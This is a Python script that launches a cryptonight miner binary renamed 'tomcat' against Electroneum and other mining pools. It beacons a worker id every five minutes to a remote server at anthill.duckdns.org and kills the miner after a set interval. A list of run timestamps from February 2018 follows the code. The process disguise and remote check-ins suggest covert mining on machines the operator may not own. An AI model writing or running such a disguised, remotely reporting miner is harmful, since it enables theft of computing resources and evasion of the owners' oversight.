import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:23:01.798541
#2018-02-17 16:09:06.198935
#2018-02-17 17:56:05.069093
#2018-02-17 19:44:04.284334
#2018-02-17 21:33:04.237976
#2018-02-17 23:17:06.946651
#2018-02-18 01:04:07.092664
#2018-02-18 02:52:02.128132
#2018-02-18 04:40:07.941899
#2018-02-18 06:31:07.753045
#2018-02-18 08:19:04.745526
#2018-02-18 10:07:03.565270
#2018-02-18 11:53:06.748675
#2018-02-18 13:38:07.444564
#2018-02-18 15:28:04.223880
#2018-02-18 17:17:01.374291
#2018-02-18 19:06:04.804300
#2018-02-18 20:52:05.036899
#2018-02-18 22:37:04.863690
#2018-02-19 00:26:03.310282
#2018-02-19 02:11:04.930611
#2018-02-19 03:59:07.127965
#2018-02-19 05:44:05.176086
#2018-02-19 07:33:05.632023
#2018-02-19 09:23:07.146076
#2018-02-19 11:12:08.728198
#2018-02-19 12:59:06.498789
#2018-02-19 14:47:08.241507
#2018-02-19 16:35:03.907861
#2018-02-19 18:23:03.601219
#2018-02-19 20:08:02.078088
#2018-02-19 21:58:01.909275
#2018-02-19 23:43:06.805437
#2018-02-20 01:32:07.641359
#2018-02-20 03:20:08.740045
#2018-02-20 05:07:01.896002
#2018-02-20 06:50:02.100411
#2018-02-20 08:36:06.677575
#2018-02-20 10:22:01.531296
#2018-02-20 12:06:05.764416
#2018-02-20 13:54:01.965077
#2018-02-20 15:38:07.965947
#2018-02-20 17:24:11.222075
#2018-02-20 19:14:01.283509
#2018-02-20 21:03:07.841252
#2018-02-20 22:47:07.822446
#2018-02-21 00:29:06.098939
#2018-02-21 02:16:02.279709
#2018-02-21 04:03:05.784781
#2018-02-21 05:50:07.948345
#2018-02-21 07:37:07.596412
#2018-02-21 09:22:06.541865
#2018-02-21 11:10:12.978504
#2018-02-21 12:57:06.008969
#2018-02-21 14:44:07.148587
#2018-02-21 16:33:11.376470
#2018-02-21 18:23:07.000711
#2018-02-21 20:08:06.162835
#2018-02-21 21:57:06.049200
#2018-02-21 23:45:02.565424
#2018-02-22 01:35:07.010984
#2018-02-22 03:24:05.682188
#2018-02-22 05:11:04.612294
#2018-02-22 06:56:06.771906
#2018-02-22 08:45:08.441627
#2018-02-22 10:32:05.931481
#2018-02-22 12:19:08.328572
#2018-02-22 14:03:07.438523
#2018-02-22 15:50:01.319250
#2018-02-22 17:37:07.308654
#2018-02-22 19:25:03.169007
#2018-02-22 21:18:01.349175
#2018-02-22 23:03:05.551806
#2018-02-23 00:49:01.999295
#2018-02-23 02:37:04.188430
#2018-02-23 04:25:01.836394
#2018-02-23 06:12:05.992280
#2018-02-23 07:58:01.236033
#2018-02-23 10:13:04.340958
#2018-02-23 12:02:08.019493
#2018-02-23 13:51:04.581904
#2018-02-23 15:44:01.542060
#2018-02-23 17:30:05.972463
#2018-02-23 19:16:06.228808
#2018-02-23 21:00:11.402856
#2018-02-23 22:45:05.561872
#2018-02-24 00:32:07.982750
#2018-02-24 02:23:01.790209
#2018-02-24 04:12:05.459519
#2018-02-24 06:00:01.671603
#2018-02-24 07:47:03.950290
#2018-02-24 09:34:01.534487
#2018-02-24 11:27:05.531520
#2018-02-24 13:16:06.424808
#2018-02-24 15:07:01.769492
#2018-02-24 16:55:03.959403
#2018-02-24 18:43:01.815029
#2018-02-24 20:34:03.732290
#2018-02-24 22:35:07.748234
#2018-02-25 01:43:05.774037
#2018-02-25 05:02:06.472396
#2018-02-25 09:54:02.009628